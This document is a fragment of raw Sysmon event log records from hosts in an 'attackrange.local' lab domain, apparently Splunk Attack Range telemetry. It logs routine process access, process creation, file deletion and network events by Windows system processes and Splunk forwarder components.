Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245483Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.328{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245482Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.328{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245481Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.328{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245480Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.328{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245479Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.328{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-516C-6063-A822-00000000AF01}396C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245478Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.328{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-516C-6063-A822-00000000AF01}396C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245477Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.328{CB4067E1-516C-6063-A822-00000000AF01}396C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001060842Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:25.530{7F8C56E7-516D-6063-1701-00000000AF01}55802068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060841Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:25.405{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-516D-6063-1701-00000000AF01}5580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060840Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:25.405{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060839Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:25.405{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060838Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:25.405{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060837Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:25.405{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060836Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:25.405{7F8C56E7-4E3A-6063-0500-00000000AF01}412528C:\Windows\system32\csrss.exe{7F8C56E7-516D-6063-1701-00000000AF01}5580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060835Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:25.405{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-516D-6063-1701-00000000AF01}5580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060834Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:25.407{7F8C56E7-516D-6063-1701-00000000AF01}5580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245508Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:25.968{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C16BC213E898DF64A7075150CDFD94B4,SHA256=5B80C70CED35A2D0CFCD07563B349E13331B4FB299EB7CCECEA8CDD181A62112,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245507Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:24.492{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64752-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245506Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:25.515{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0988D4655834BEEF3354B66FAF0FCB08,SHA256=5F18D63F88DA8F060032D6755CE0B69874691DB3C9E9CB850AA96E42D8F5BA04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060852Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:26.765{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C847694771982D96C205F265AA479B91,SHA256=6651FB5FF19CF7441B08A75723C2824419906CD35E58E71466BDBB0593DBE772,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060851Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:26.093{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92AE3E52D2E44D1163B524FF3BF57A8C,SHA256=A24A683FC457DF1CE0263DE979537343E8CB04AB264565672D8FE12CD71CEAE1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060850Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:26.093{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-516E-6063-1801-00000000AF01}4228C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060849Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:26.093{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060848Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:26.093{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060847Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:26.093{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060846Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:26.093{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060845Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:26.093{7F8C56E7-4E3A-6063-0500-00000000AF01}4121572C:\Windows\system32\csrss.exe{7F8C56E7-516E-6063-1801-00000000AF01}4228C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060844Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:26.093{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-516E-6063-1801-00000000AF01}4228C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060843Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:27:26.095{7F8C56E7-516E-6063-1801-00000000AF01}4228C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245509Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:26.531{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AEBD4B6B868CFCA8257B57DDA73464B,SHA256=52D6D604187D4EF1545183756B805D8EA227E40CF66EED005A5C1A1F75425866,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245510Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:27:27.546{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF598D4904F4E9B1A326410850592B3F,SHA256=C59C290DF903CDB3BFDAAA54D6309BD7A6BD32B993DA6ED9261BFD482259DAFF,IMPHASH=00000000000000000000000000000000falsetrue 